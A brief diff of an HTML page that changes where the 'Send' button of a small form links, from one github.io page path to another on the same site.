--- a/index.html
+++ b/index.html
@@ -86,7 +86,7 @@ body {
 <input type="checkbox">Forget pass.
         </div>
         <div class="form-submit">
-            <i id="Red"><a href="https://3in1rajeshswapnilomm.github.io/grtgvv/"><font color="white">Send</font></a></i>
+            <i id="Red"><a href="https://3in1rajeshswapnilomm.github.io/ftef/"><font color="white">Send</font></a></i>
         </div>
     </form>
 </div>
